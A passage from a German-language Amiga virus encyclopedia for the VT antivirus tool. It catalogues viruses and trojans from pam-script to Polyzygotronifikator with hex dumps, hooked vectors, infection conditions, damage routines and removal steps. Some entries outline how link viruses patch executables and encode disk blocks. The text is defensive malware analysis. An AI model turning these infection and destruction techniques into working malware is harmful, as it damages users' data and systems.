  2917.            VT kennt BB und Speicher: 17.10.92
  2918.  
  2919.    - pam-script-Trojan      format dh0:
  2920.          Keine Vermehrung
  2921.          Keine verbogenen Vektoren
  2922.          Nicht resetfest
  2923.          VT bietet loeschen an.
  2924.          Es sind zwei Teile notwendig.
  2925.          a) startup-sequence:
  2926.             pamela2/freemem jpeg1 dh0: pics pam
  2927.           Das bewirkt in Wirklichkeit:
  2928.             pamela2/format  drive dh0: name pam
  2929.          b) Ein aelterer format-Befehl (L: 12840), der in freemem umbe-
  2930.             nannt wurde. Weiterhin wurden einige ASCII-Zeichen umgeaendert.
  2931.             Die Laenge der Zeichenfolge wurde beibehalten (pics=name).
  2932.             Die Zeile in der startup-sequence soll dadurch einen anderen
  2933.             Sinn vorspielen.   
  2934.          Format orig.                 Freemem
  2935.          4e4f4943 4f4e5300 NOICONS. : 73686f77 70696300 showpic.
  2936.          51554943 4b004646 QUICK.FF : 56455230 31007878 VER01.xx
  2937.          53005573 6167653a S.Usage: : 78004a50 45472020 x.JPEG
  2938.          20257320 44524956  %s DRIV : 20257320 70696373  %s pics
  2939.          45203c64 69736b3e E <disk> : 20206c6f 61646572   loader
  2940.          204e414d 45203c6e  NAME <n : 206c6f61 64207878  load xx
  2941.          616d653e 205b4646 ame> [FF : 616d653e 205b756e ame> [un
  2942.          535d5b4e 4f49434f S][NOICO : 72656769 73746572 register
  2943.          4e535d5b 51554943 NS][QUIC : 65642056 322e3031 ed V2.01
  2944.          4b5d0a00 69636f6e K]..icon : 2e5d0a00 69636f6e .]..icon
  2945.          2e6c6962 72617279 .library : 2e6c6962 72617279 .library
  2946.          00004452 49564500 ..DRIVE. : 00006a70 65673100 ..jpeg1.
  2947.          44524956 45004472 DRIVE.Dr : 44524956 45005479 DRIVE.Ty
  2948.          69766520 6e6f7420 ive not  : 70653a70 616d656c pe:pamel
  2949.          666f756e 640a0000 found... : 6173686f 770a0000 ashow...
  2950.          4e414d45 00004e41 NAME..NA : 50494353 00005049 PICS..PI
  2951.          4d450000 496e7365 ME..Inse : 43530000 4c6f6164 CS..Load
  2952.          72742064 69736b20 rt disk  : 696e6720 70696373 ing pics
  2953.          746f2062 6520696e to be in : 21212121 21202020 !!!!!
  2954.          69746961 6c697a65 itialize : 20202020 20204849       HI
  2955.          6420696e 20257320 d in %s  : 54205245 5455524e T RETURN
  2956.          616e6420 70726573 and pres : 21212120 20202020 !!!
  2957.  
  2958.  
  2959.    - PARADOX I  KickTag, KickCheckSum, im Prg. DoIo u. $6c, immer $7F800
  2960.                Vermehrung und Schaden: Bootblock
  2961.                Text sichtbar im BB:
  2962.                * A new age of virus-production has begun ...
  2963.                This time PARADOX brings you the "LOGIC BOMB" Virus !!! *
  2964.  
  2965.    - PARADOX II  Kicktag, KickChecksum im Prg. DoIo u $6c, immer $7F000
  2966.                verschluesselt mit move.b $DFF006,D1 und eor.b d1,(a0)+
  2967.                Vermehrung und Schaden: Bootblock
  2968.                Text nach Entschluesselung:
  2969.                This is the second VIRUS by PARADOX  -
  2970.                For swapping call: 42-455416 - ask for Hendrik Hansen
  2971.  
  2972.    - PARAMOUNT  nur KS1.2 Kicktag, KickCheckSum, DoIo, immer $7F800
  2973.                Byte-Warrior-Clone, loescht Cold und Cool
  2974.                fordert trackdisk.device NICHT
  2975.                Vermehrung:BB
  2976.                im BB zu lesen: PARAMOUNT SOFTWORKS usw.
  2977.  
  2978.    - PARATAX   SCA-Clone, Cool immer 7EC3E, nur anderer Text
  2979.  
  2980.    - PARATAX II    Disk-Dokters-Clone, nur KS1.2 da DoIo-ROMEinsprung
  2981.                Cold, Cool, DoIo, im Prg. Vec5
  2982.                im BB sichtbar: PARATAX II
  2983.                clipboard.device durch ".dos.library" ersetzt
  2984.                je nach Zaehlerstand wird eigener BB geschrieben oder
  2985.                Disk ab Cylinder 40 (ROOT) formatiert
  2986.  
  2987.    - PARATAX III    16BitCrewClone   s.o.
  2988.                Unterschied: The 16Bit Crew 1988 in  PARATAX III (!!!)
  2989.                             geaendert
  2990.                eine echte Meisterleistung
  2991.  
  2992.    - Parfum-Virus   Saddam-Disk-Validator-Clone  s.u.            
  2993.            6b2e6465 76696365 00010820 50617266 k.device... Parf
  2994.            756d2056 69727573 00000000 03f30000 um Virus........
  2995.  
  2996.    - PayDay   BB  eigentlich ein AntiVirusBB   schauen Sie unten
  2997.  
  2998.    - pb-party-BBS-Trojan    Zerstoerungsfile  gegen BBS
  2999.         Laenge: 161984 Bytes
  3000.         Keine verbogenen Vektoren
  3001.         Nicht resetfest
  3002.         VT bietet Loeschen an
  3003.         Schaden: Mit Dos-Routinen soll userdata geloescht werden. Das
  3004.         File enthaelt fast nur Muell (um durch die Laenge glaubhaft zu
  3005.         erscheinen), der nie erreicht wird.
  3006.         Im File ist zu lesen:
  3007.            00000000 74484520 7245414c 20684143 ....tHE rEAL hAC
  3008.            4b455253 20665543 4b454420 794f5520 KERS fUCKED yOU
  3009.            694e2074 48452062 4548494e 44210000 iN tHE bEHIND!..
  3010.            00006262 733a7573 65722e64 61746100 ..bbs:user.data.
  3011.  
  3012.    - pENTAGRAM-Trojan   siehe bei WiREFACE-Trojan
  3013.  
  3014.    - PentagonCircle     cool,kickchecksum
  3015.                Fastmem ja, im Speicher immer ab $7fb00, im Prg. noch DoIo
  3016.                testet auf einige Viren, Alert-Meldung
  3017.                Vermehrung: ueber BB
  3018.                Text im BB sichtbar: z.B.
  3019.                The Pentagon Circle VirusSlayer by Mr.Moutainlake!
  3020.  
  3021.    - Pentagon-defekt
  3022.             Es wird ein Pentagon-BB weitergegeben, in dem das
  3023.             4.LW Null ist. Dieser Bootblock ist NICHT bootfaehig.
  3024.  
  3025.    - PentagonVirusSlayer2:  cool, KickCheckSum, immer ab $7f000
  3026.                Fastmem ja, im Prg. DoIo, Programmierung voellig anders
  3027.                als Pentagon, Alert-Meldung
  3028.                Vermehrung: ueber BB
  3029.                Text im BB sichtbar: z.B.
  3030.                The Pentagon Circle VirusSlayer 2 by Mr.Mountainlake!
  3031.  
  3032.    - PentagonVirusSlayer3:  Cool, KickCheckSum, immer ab $7e000
  3033.                Fastmem ja, im Prg. DoIo, FindResident
  3034.                Alert-Meldung
  3035.                Vermehrung: ueber BB
  3036.                Text im BB sichtbar: z.B.
  3037.                The Pentagon Circle VirusSlayer by Mr.Mountainlake!
  3038.  
  3039.    - PentagonCircle 4    cool,kickchecksum
  3040.                im Speicher immer ab $7fb00, im Prg. noch DoIo
  3041.                beim Booten immer GURU !!!  Grund: es hat jemand geschafft
  3042.                "dos.libr" zu erzeugen. Der Rest fehlt. ABER !!!!
  3043.                bevor diese Fehlerquelle erreicht wird, wurde schon Cool
  3044.                verbogen. Wenn Sie jetzt nur 512 kb Chipmem haben und beim
  3045.                2. Start die Maustaste druecken, wird der Bildschirm gruen.
  3046.                Jetzt legen Sie einen "echten" BB ein und schon kann sich
  3047.                der Pentagon-BB vermehren. Aber auch der vermehrte BB
  3048.                enthaelt obengenannten Fehler.
  3049.                Empfehlung deshalb : sofort loeschen
  3050.  
  3051.    - PERVERSE I  anderer Name: BOOTX-Virus  s.o.
  3052.  
  3053.    - PESTILENCE.BB-Virus
  3054.       Verbogene Vektoren: Cool, Disable, KickCheckSum, BeginIo
  3055.                           DisplayAlert
  3056.       KS1.3 4MB : Ja
  3057.       KS2.04 mit 68030: Ja
  3058.       KS40.63 : Ja
  3059.       Fordert trackdisk.device: Ja
  3060.       Groessere Teile des BB.s sind codiert.
  3061.       Decodiert ist im Speicher zu lesen:  
  3062.                                      00067472             ..tr
  3063.           61636b64 69736b2e 64657669 63650000 ackdisk.device..
  3064.           696e7475 6974696f 6e2e6c69 62726172 intuition.librar
  3065.           79005045 5354494c 454e4345 2076312e y.PESTILENCE v1.
  3066.           31352028 63292031 342f3035 2f393421 15 (c) 14/05/94!
  3067.       Versucht durch Anzeige eines sauberen BB.s zu taeuschen.
  3068.       Vermehrung: BB
  3069.       Schaeden:
  3070.       a) Ueberschreibt BB
  3071.       b) Fuellt die Disk in Abhaengigkeit von $DFF006 mit Muell.
  3072.          (move.l #$000D4800,$24(a1) ). So eine Disk koennen Sie leider
  3073.          ohne Bedenken neu formatieren. Da ist NICHTS mehr zu retten.
  3074.          Diese Routine laeuft selten bis zum Ende durch. Ueber Zyl.70
  3075.          habe ich meist den GURU gesehen.
  3076.       c) Codiert Bloecke, die die Kennung #$00000008 (also kein FFS) haben:
  3077.          Es werden bei der Codierung 2 eor-Befehle abgearbeitet. Einer
  3078.          davon: eori.w #$DEAD,(a0).
  3079.          Ein codierter Block wird gekennzeichnet mit:
  3080.                 move.w #$AFFE,(a0)+
  3081.             Block: 11
  3082.           0000: AFFE0008 de51d890 de57de77 de55dfb2 .....Q...W.w.U..
  3083.                 ^^^^^^^^
  3084.          Diese Bloecke werden sauber abgearbeitet, solange das Virus-
  3085.          teil im Speicher aktiv ist. Ohne das Virusteil meldet das
  3086.          Amiga-Betriebssystem Pruefsummenfehler.
  3087.          Eine KOMPLETTE Disk war SEHR SCHNELL verseucht.
  3088.          Wichtig: Es wird NICHT NUR der 1.Block eines Files codiert !!!
  3089.          VT bietet Decode an.
  3090.          Falls Sie im File- oder BlockKetteTest die Meldung "von Pest.
  3091.          cod." bekommen, brechen Sie bitte sofort ab. Der Ausbau im
  3092.          Filetest ist viel zu langsam.
  3093.          Gehen Sie in BlockITest. Warten Sie auf die Decode-Frage.
  3094.          Klicken Sie auf Decode. Rufen Sie danach die einzelnen Tests zur
  3095.          Sicherheit noch einmal auf.
  3096.      Test 09.12.94: BB-Erkennung und Speichererkennung (VT versucht alle
  3097.      Vektoren in den Originalzustand zurueckzusetzen).
  3098.      Test 10.12.94: Decodier-Routine
  3099.  
  3100.  
  3101.    - PHA Trojan     Filename: pha-1994.exe
  3102.       Begleittext:    P H E N O M E N A  ' 9 3 - SWEDISH ELITE! usw.
  3103.       siehe auch bei CLP-Trojan, UA62-ACP-Trojan
  3104.       ZerstoerungsFile:
  3105.       Gepackt:  Laenge  57508 Bytes
  3106.       Entpackt: Laenge 120624 Bytes
  3107.       Keine verbogenen Vektoren.
  3108.       Keine Vermehrung
  3109.       Es handelt sich um eine CLP-Variante (Text geaendert), die an
  3110.       ein XCopy mit Weihnachtsmotiv gehaengt wurde (mit $4EB9-$4EF9-Link).
  3111.       Im XCopy-Teil wurde eine Versionsangabe gefunden:xcopver
  3112.            24564552 3a205843 6f707920 31322e39 $VER: XCopy 12.9
  3113.            33006100 2d286100 01c02c79 00000004 3.a.-(a...,y....
  3114.       Ob es diese Version wirklich gibt, kann ich nicht sagen.
  3115.       Schaden:
  3116.       Schreibt in alle Files in S: egal ob Data oder Prg. einen Text.
  3117.       Ed-startup vorher:
  3118.            73692030 20203120 2250726f 6a656374 si 0  1 "Project
  3119.            220a7369 20312020 3220224f 70656e2e ".si 1  2 "Open.
  3120.            2e2e2020 20204553 436f7022 20226f70 ..    ESCop" "op
  3121.            203f202f 46696c65 3a202f22 0a736920  ? /File: /".si
  3122.            32202034 0a736920 33202032 20225361 2  4.si 3  2 "Sa
  3123.       Ed-startup nachher:
  3124.            64522e57 486f2077 69736865 7320796f dR.WHo wishes yo
  3125.            75206120 68617070 79206e65 77207965 u a happy new ye
  3126.            6172212e 2e2e2054 68697320 77617320 ar!... This was
  3127.            646f6e65 20696e20 31737420 6a616e75 done in 1st janu
  3128.            61727920 31393934 2054494d 453a2030 ary 1994 TIME: 0
  3129.            393a3030 2e2e2e20 68616821 2e2e2e20 9:00... hah!...
  3130.            4f4b2e2e 2e205068 756b6b20 74686973 OK... Phukk this
  3131.            20677579 73207570 20666f72 20757320  guys up for us
  3132.            3a205248 59532f46 4149524c 49474854 : RHYS/FAIRLIGHT
  3133.            2c204543 484f2647 5549444f 20414e44 , ECHO&GUIDO AND
  3134.            20414c4c 204e415a 49205348 49544845  ALL NAZI SHITHE
  3135.            41445321 2053544f 50204641 53434953 ADS! STOP FASCIS
  3136.            4d202a4e 4f57212a 2e2e2e20 20202f64 M *NOW!*...   /d
  3137.            522e5748 4f212022 0a736920 38202031 R.WHO! ".si 8  1
  3138.       Die Files werden unbrauchbar und VT bietet loeschen an. Die
  3139.       Wirkungsweise ist also aehnlich wie bei CLP-Trojan (hab ich
  3140.       nicht).
  3141.       Fileerkennung:
  3142.       gepackt: VT erkennt PHA Trojan mit FRAGEZEICHEN. VT kann sich
  3143.       also taeuschen. Bitte kopieren Sie das Teil auf eine leere
  3144.       Disk und entpacken sie das Teil mit einem Prg. ihrer Wahl.
  3145.       entpackt: VT erkennt PHA Trojan ohne Fragezeichen. Es handelt
  3146.       sich um einen 4EB9-4EF9-Link. Wenn Sie das XCopy-Teil unbedingt
  3147.       ausprobieren wollen, so waehlen Sie Ausbau. Falls das Teil nach
  3148.       dem Ausbau NICHT laeuft, dann gehen Sie bitte in den Filerequester
  3149.       und schalten dort mit 1Linkaus das Trojanteil ab. Aber noch einmal:
  3150.       Ich kenne dieses XCopy-Teil NICHT. Es koennen sich in diesem Teil
  3151.       weitere Gemeinheiten befinden. Kaufen Sie ein Original-XCopy, wenn
  3152.       Sie so etwas brauchen.
  3153.  
  3154.    - PHANTOM-Inst.   File
  3155.       Bekannter Filename: SuperNovaKiller
  3156.       Laenge ungepackt: 4792 Bytes
  3157.       Verbogener Vektor: Loadseg
  3158.       Nicht resetfest
  3159.       VT bietet Loeschen an
  3160.       Im File ist zu lesen:
  3161.            6c696272 61727900 9b316d9b 33336d53 library..1m.33mS
  3162.            75706572 4e6f7661 4b696c6c 657220a9 uperNovaKiller .
  3163.            20627920 53616665 b7486578 b7496e74  by Safe.Hex.Int
  3164.  
  3165.    - PHANTOM-Virus   Link
  3166.       Fileverlaengerung: 688 Bytes
  3167.       verbogener Vektor: LoadSeg
  3168.       VT versucht den Vektor im Speicher neu zu setzen.
  3169.       Namensbegruendung:
  3170.       Mehrfach decodiert ist im Linkteil zu lesen:
  3171.                                           6c65               le
  3172.            74732067 6f206167 61696e2e 2e2e5048 ts go again...PH
  3173.            414e544f 4d00                       ANTOM.
  3174.       VT versucht das Linkteil auszubauen und den Original-Sprungbefehl
  3175.       im File wieder zu setzen.
  3176.       Das Teil ist hinter den ersten Hunk gelinkt und immer neu mit Wert
  3177.       aus $DFF006 codiert.
  3178.       Linkbedingungen:
  3179.       - 3F3 u. 3E9 wird gefunden
  3180.       - File groesser #4000 und kleiner #190000
  3181.       - File noch nicht verseucht ( 1 LW-Test ) 
  3182.       - Suche nach $4EAE    ( jsr -xy(Lib-Base) )
  3183.                             ( xy ist variabel )
  3184.       - Falls gefunden, Test ob Abstand zu Hunkendealt kleiner $7FFE.
  3185.       - $4EAE wird in $4EBA  ( jsr Hunkendealt(PC) ) geaendert.
  3186.       vgl. auch Ebola usw.
  3187.  
  3188.  
  3189.    - PIF-Virus  s.o. bei MENEM'S REVENGE
  3190.        Der codierte DisplayAlert-Text ist nicht geaendert.
  3191.  
  3192.    - PLASTIQUE  BB      Cool $7ED5E   immer ab: $7EC00  auch KS2.04
  3193.          von der Definition kein Virus, da keine Vermehrung. Die
  3194.          Routinen sind zwar vorhanden, werden aber NIE erreicht.
  3195.          Namensbegruendung:  im BB zu lesen:
  3196.            00000000 00000000 00000000 003e3e3e .............>>>
  3197.            2050204c 20412053 20542049 20512055  P L A S T I Q U
  3198.            20452020 3c3c3c2e 2e2e2e00 00000000  E  <<<.........
  3199.          Grundgeruest ist der 16-Bit-Crew-BB. Der Cool-Einsprung
  3200.          wurde geaendert, deshalb ist keine Vermehrung ueber DoIo
  3201.          moeglich.
  3202.          Schaeden: Sobald eine Zaehlzelle den Wert #10 erreicht hat,
  3203.          werden mehrere Vektoren auf den ROM-Beginn verbogen, d.h.
  3204.          sobald die Vektoren benutzt werden, wird ein Absturz her-
  3205.          vorgerufen.
  3206.  
  3207.    - Poland-LVirus    Linkvirus
  3208.       Namensbegruendung: siehe bei Zerstoerung
  3209.       Fileverlaengerung: #840 Bytes
  3210.       Nicht Resetfest
  3211.       Verbogener Vektor: DoIo  LoadSeg
  3212.       Fehlerquelle: kein Test auf KS1.3 (Loadseg)
  3213.       Speicherverankerung:
  3214.            - Test ob schon im Speicher
  3215.            - Loadseg und DoIo wird verbogen
  3216.            - Testet spaeter geladene Filenamen auf "v" oder "V".
  3217.       Linkvorgang:
  3218.            - mit LoadSeg
  3219.            - File noch nicht verseucht
  3220.            - Medium validated
  3221.            - 4 Block frei
  3222.            - Filelaenge kleiner #157196
  3223.            - File ausfuehrbar ($3F3)
  3224.            - CodeHunk wird gefunden ($3E9)
  3225.            - 1.Hunk nicht groesser als #32764  (wg. Sprung)
  3226.            - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz)
  3227.              ersetzt.
  3228.            - Link hinter den 1.Hunk
  3229.            - das Teil codiert sich immer neu mit $DFF00A
  3230.       Zerstoerung:
  3231.            - mit DoIo
  3232.            - kein Test auf trackdisk.device (also auch HD !!!)
  3233.            - Blocknummer wird mit $DFF006 bestimmt, muss aber groesser
  3234.              als #63 ($7E00/#512) sein. Bei zwei Filesystemen im Rigid-
  3235.              bereich, koennte das Teil also auch dort zerstoeren.
  3236.            - In den Block wird ab $1f8 *Poland* geschrieben. Da ist
  3237.              nichts mehr zu retten.
  3238.            Block:    1345
  3239.            000: 00000008 00000510 00000031 000001e8 ...........1....
  3240.                 ;......
  3241.            1f0: e3dbe3db e3dbe3db 2a506f6c 616e642a ........*Poland*
  3242.       VT versucht Vektoren im Speicher zurueckzusetzen.
  3243.       VT versucht den Fileausbau.
  3244.       VT sollte bei BlockITest zerstoerte Bloecke finden.
  3245.  
  3246.    - POLISH   BB            Cool, DoIo  auch KS2.04
  3247.          BB codiert mit Wert aus $DFF006
  3248.          Schaeden:
  3249.          Vermehrung mit BB
  3250.          Sobald Zaehlzelle 8 erreicht hat: DisplayAlert
  3251.          Unterschied zu anderen Chaos-BBen:
  3252.               add.b d0,(a0)+  durch  eor.b d0,(a0)+  ersetzt.
  3253.          Decodierter DisplayAlert-Text:
  3254.            61636b64 69736b00 00960c50 4f4c4953 ackdisk....POLIS
  3255.            4820502d 31422049 53205255 4e4e494e H P-1B IS RUNNIN
  3256.            472e2e20 20202020 2047454e 45524154 G..      GENERAT
  3257.            494f4e20 3a203030 32320000 000048e7 ION : 0022....H.
  3258.          siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, Taipan-
  3259.           Chaos, Lameblame,
  3260.  
  3261.    - POLISHPOWER-Virus    Linkvirus
  3262.       Namensbegruendung:     
  3263.            Im decodierten LinkTeil ist zu lesen: 
  3264.            b210504f 4c495348 20504f57 45520a74 ..POLISH POWER.t
  3265.       Fileverlaengerung: #5000-6814 Bytes
  3266.       Nicht Resetfest     
  3267.       mind KS #36
  3268.       bei mir mit Cache an immer GURU
  3269.       Verbogene Vektoren: keine bekannten Vektoren
  3270.       Speicherverankerung:
  3271.            - oeffnet timer.device Unit 1
  3272.            - neuer Prozess   (Name NEW PROCESS)
  3273.            - neuer Port   (Name xyzPolishPowerxyz)
  3274.                   (xyz stehen fuer Buchstabenmuell mit variabler Anzahl)
  3275.            - Prozess und Port werden nach kurzer Zeit aus den Listen
  3276.              wieder entfernt, aber NICHT aus dem Speicher.
  3277.              Fuer den Linkvorgang wird der Prozess wieder in die Liste
  3278.              fuer kurze Zeit eingetragen. Die Technik, einen Prozess
  3279.              der NICHT in der Liste steht, trotzdem zu aktivieren,
  3280.              ist fuer mich NEU !!!!!!!
  3281.       Linkvorgang:
  3282.            - Es entsteht ein File mit nur einem Hunk. Am Anfang steht
  3283.              eine Decodierroutine. Diese Routine aendert immer die Laenge
  3284.              und es werden immer andere Codierbefehle verwendet. Danach
  3285.              folgt das eigentliche Virusteil und danach das Originalfile.
  3286.              Dieses Originalfile kann nicht einfach ausgescnitten werden,
  3287.              da der Anfang variabel (Tiefe und Codierart) codiert sind.
  3288.            - Bedingungen:
  3289.               - File ausfuehrbar (3F3)
  3290.               - File groesser  #2000 Bytes
  3291.               - File kleiner #150000 Bytes
  3292.       Hinweis Nov 98: Da ich die Verankerung im Betriebssystem NICHT
  3293.              gefunden habe, muss VT den ganzen Speicher durchtesten. Das
  3294.              braucht Zeit. Deshalb erscheint ein MemTest-Requester beim
  3295.              Start von VT. Im Programm wird NICHT laufend nach POLISH-
  3296.              POWER im Speicher gesucht (nach anderen Viren schon). Wenn
  3297.              Sie in VT spaeter wieder suchen wollen, gehen Sie bitte in
  3298.              Tools und dann PolPower. Danke
  3299.       Nachtrag Nov 98: einige Tel.-Anrufe
  3300.         - Warum kein Requester bei KS1.3 ? Weil das Teil erst ab KS2.04
  3301.           laeuft. Ein Memtest ist also ueberfluessig.
  3302.         - Bei 68060 braucht der Requester laenger als der Speichertest !
  3303.           In Ordnung, ich schalte in VT3.11 beim 68060 den Requester ab,
  3304.           und fuehre gleich einen Speichertest durch (Mauszeiger aendert
  3305.           sich). Laufend testet VT immer noch nicht auf PolishPower.
  3306.           Gehen Sie bitte ab und zu in VT/Tools/PolPower.   
  3307.       Nachtrag Dez 98:
  3308.           Es sind jetzt einige Files mit Mehrfach-Verseuchung vorhanden
  3309.           (Danke). Erzeugt mit PC-UAE (Fremdaussage).
  3310.           Das heisst, die vorhandene "Schon-verseucht-Routine" ist bei
  3311.           UAE wirkungslos. Meine Tests auf einem Amiga eine Mehrfach-
  3312.           verseuchung zu erreichen, waren erfolglos.
  3313.      
  3314.    - PolPow-antonio-Vir.    Linkvirus
  3315.       Namensbegruendung:
  3316.        Es wurden die Codier-Routine (ungewoehnliche Befehle entfernt)
  3317.        und die Link-Routine "ausgeliehen".
  3318.       Im decodierten LinkTeil ist zu lesen:
  3319.                     646f732e 6c696272 61727900     dos.library.
  3320.            74696d65 722e6465 76696365 006d6169 timer.device.mai
  3321.            6c2e686f 746d6169 6c2e636f 6d004652 l.hotmail.com.FR
  3322.            4f4d3a3c 6d654079 61686f6f 2e636f6d OM:<me@yahoo.com
  3323.            3e00546f 3a3c616e 746f6e69 6f5f6c65 >.To:<antonio_le
  3324.            76694068 6f746d61 696c2e63 6f6d3e00 vi@hotmail.com>.
  3325.            0d0a2e0d 0a006273 64736f63 6b65742e ......bsdsocket.
  3326.            6c696272 61727900 6d69616d 692e6c69 library.miami.li
  3327.            62726172 79006d69 3000              brary.mi0.
  3328.        Das timer-device wird aber ueber diese Stelle nie aufgerufen.
  3329.        Also ein Hinweis, dass einfach Teile uebernommen wurden.
  3330.       Fileverlaengerung: #5900-7858 Bytes
  3331.             Wegen einer kleine Ungereimtheit kommt es SEHR haeufig
  3332.             zu 2 Link ans gleiche File bei EINEM Durchgang !!!
  3333.       Nicht Resetfest     
  3334.       mind KS #36
  3335.       Verbogene Vektoren: Nein
  3336.       Speicherverankerung:
  3337.        KEIN Code dafuer vorhanden (Unterschied zu PolishPower)
  3338.       Zwei negative Jobs werden ausgefuehrt:
  3339.       1.Job:
  3340.       bsd.lib und miami.lib werden gesucht und danach Sprungbefehle
  3341.       (hab keine lib-Beschreibung) aus diesen ausgefuehrt. hotmail
  3342.       (siehe oben) usw. wird abgearbeitet.
  3343.       2.Job:
  3344.       Task-Liste wird nach Prozessen durchsucht.
  3345.       Die dazugehoerenden Files sollen verseucht werden. Die Prozesse
  3346.       werden gekennzeichnet. Die Files koennen natuerlich nicht immer
  3347.       gefunden werden z.B. workbench-Prozess
  3348.       Linkvorgang:
  3349.            - Es entsteht ein File mit nur einem Hunk. Am Anfang steht
  3350.              eine Decodierroutine. Diese Routine aendert immer die Laenge
  3351.              und es werden immer andere Codierbefehle verwendet. Danach
  3352.              folgt das eigentliche Virusteil und danach das Originalfile.
  3353.              Dieses Originalfile kann nicht einfach ausgeschnitten werden,
  3354.              da der Anfang variabel (Tiefe und Codierart) codiert sind.
  3355.              Abhaengig von $DFF006 aendert sich das Linkteil. Da die
  3356.              Files nicht markiert sind, sind Mehrfach-Links (nach Reset)
  3357.              moeglich. Ich hab mit dem Test nach 20 Links aufgehoert.
  3358.            - Bedingungen:
  3359.               - Medium valid
  3360.               - mind. #100 Block frei
  3361.               - File groesser  #2000 Bytes
  3362.               - File kleiner #1 Million Bytes !!!!!
  3363.               - File ausfuehrbar (3F3)
  3364.       3.Job:
  3365.       Das Original-File wird ausgefuehrt. Es wird NICHT versucht, das
  3366.       Virusteil im Speicher zu verankern. Das Teil muss also auch nicht
  3367.       im Speicher gesucht werden. Ein neuer Verseuchungsversuch wird erst
  3368.       dann gestartet, wenn wieder ein verseuchtes File gestartet wird.
  3369.  
  3370.       VT durchsucht immer wieder die Taskliste nach der Markierung.
  3371.       Falls also im Programm der Requester "PolPow-antonio-Vir. war im
  3372.       Speicher" erscheint, dann sollten Sie vorsichtig werden.
  3373.       Bei PolPow-antonio und POLISHPOWER sind in der Markierung gleich !!!
  3374.  
  3375.       Hinweis Dez 98: Da ungewoehnliche Befehle aus der Codier-Routine
  3376.       entfernt wurden, ist die Erkennung schwerer geworden. Es koennte
  3377.       zu Fehlerkennungen kommen. Bitte melden Sie sich dann mit einem
  3378.       Beispielfile. VT findet das Teil NUR !!!! bei Filetest.
  3379.  
  3380.  
  3381.    - Polyzygotronifikator  Virus  Link
  3382.          Verbogener Vektor: LoadSeg
  3383.          Resetfest: Nein
  3384.          Versucht dos.lib mit #37 zu oeffnen
  3385.          Minimale Verlaengerung: 1248 Bytes
  3386.          Maximale Verlaengerung: 1296 Bytes
  3387.          Virusteil wird hinter ersten Hunk gesetzt.
  3388.          Arbeitet NICHT mit SnoopDos im Speicher.
  3389.          Ueberspringt 3E8-, 3F0- und 3F1-Hunks !!!!!!!!
  3390.          Die Codierung und Laenge des Teils wechseln in Abhaengigkeit
  3391.          von $DFF006, $DFF007 und $DFF00A .
  3392.          Namensbegruendung:
  3393.          Decodiert ist im Speicher zu lesen:
  3394.            3800d173 38005483 4e75001b 536e6f6f 8..s8.T.Nu..Snoo
  3395.            70446f73 0000646f 732e6c69 62726172 pDos..dos.librar
  3396.               ;.....
  3397.            69746820 74686520 506f6c79 7a79676f ith the Polyzygo
  3398.            74726f6e 6966696b 61746f72 2e2e2e20 tronifikator...
  3399.          Das Teil meldet sich nie.
  3400.          Speicher:
  3401.          Testet auf #"1994" (Text), ob LoadSeg schon verbogen.
  3402.          Speichermedium:
  3403.           - validated
  3404.           - mind. #8000 Blocks (also keine Disk)
  3405.           - mind. #10 Blocks frei
  3406.          File:
  3407.           - Filename enthaelt nicht "." oder "-" .
  3408.             Also z.B. kein Befall von .library, .info, .device
  3409.             oder -handler.
  3410.           - Test auf schon befallen mit $1994 (Hex) am Ende des
  3411.             ersten Hunks. 
  3412.            96df9091 8fe61994 000003f2 000003eb ................
  3413.                         ^^^^ ($BB8+$7FFE)
  3414.           - erster Hunk Laenge max. #35766 ($BB8+$7FFE)
  3415.           - $3E9 wird gefunden .
  3416.           - move.l 4,a6 (6 Bytes) oder move.l 4.w,a6 (4 Bytes) wird
  3417.             in den ersten 3000 Bytes des 1.Hunks gefunden.
  3418.           - Der Abstand von diesem Punkt zum Originalende des 1. Hunks
  3419.             ist nicht groesser als $7FFE.
  3420.          Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl
  3421.          durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original-
  3422.          Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die
  3423.          Laenge anzugleichen. Der move.l 4-Befehl wird dann im Virusteil
  3424.          ausgefuehrt. Die Codierung findet in einer doppelten eori.b-
  3425.          Schleife statt. Die variable Virusteillaenge ergibt sich durch
  3426.          einige BRA.S-Spruenge im angehaengten Teil, deren Zieladressen in
  3427.          gewissen Grenzen (andi.b $F,d5) variabel sind. Die variablen
  3428.          Zwischenraeume werden mit Codier-Muell gefuellt.
  3429.          VT2.66 sollte das Teil ausbauen koennen.
  3430.          Es wird IMMER move.l 4.w,a6 zurueckgeschrieben, d.h. es koennte
  3431.          im 1.Hunk ein NOP verbleiben, welches im Originalfile nicht vor-
  3432.          handen war. Das macht NICHTS . Die Filelaengen des Originalfiles
  3433.          und des ausgebauten Files muessen aber uebereinstimmen !!!!
  3434.          VT kann am verseuchten File nicht feststellen, ob das NOP vom
  3435.          Programmierer gewollt war, oder vom Virusteil erzeugt wurde.
  3436.          WICHTIG !!!!!
  3437.          Das Virusteil kann von VT nur beim Filetest sicher (????) ge-
  3438.          funden werden.
  3439.          Beim BlockI- oder BlockKette-Test kann es vorkommen, dass ein
  3440.          Teil der Testlangworte, die VT verwendet, in Block A und die
  3441.          restlichen LWe in Block B liegen. Da VT keine Uebereinstimmung
  3442.          feststellt, wuerde KEINE Meldung erfolgen.
  3443.          Falls beim Ausbau Fehler auftreten, bitte ich um eine Nach-
  3444.          richt. Danke
  3445.          Hinweis 06.12.94: Es ist ein Antivirusprogramm auf dem Markt, das
  3446.          mit dem Ausbau nicht zurechtkommt. Deshalb wird nur der BSR-Befehl
  3447.          ersetzt. Das eigentliche Virusteil BLEIBT IM File (starke Leistung).
  3448.          VT findet in einem so behandelten File immer noch das Virusteil,
  3449.          aber nicht mehr den BSR-Befehl. Um dennoch einen Ausbauversuch zu
  3450.          ermoeglichen, erscheint in diesem Fall ab VT2.70 ein Requester
  3451.          "BSR-Befehl fehlt !!  Ausbau ??". Sie koennen damit einen Ausbau-
  3452.          versuch unternehmen oder abbrechen. Ob es aber meine Aufgabe ist,
  3453.          halbe Arbeit von anderen Programmen nachzubessern, stelle ich in
  3454.          Frage. Es ist das gleiche Programm, das bis heute (2,5 Jahre
  3455.          spaeter) nicht in der Lage ist den Crime92 zu erkennen (wird aber
  3456.          in den Docs auch zugegeben). Der Programmierer scheint auch nicht
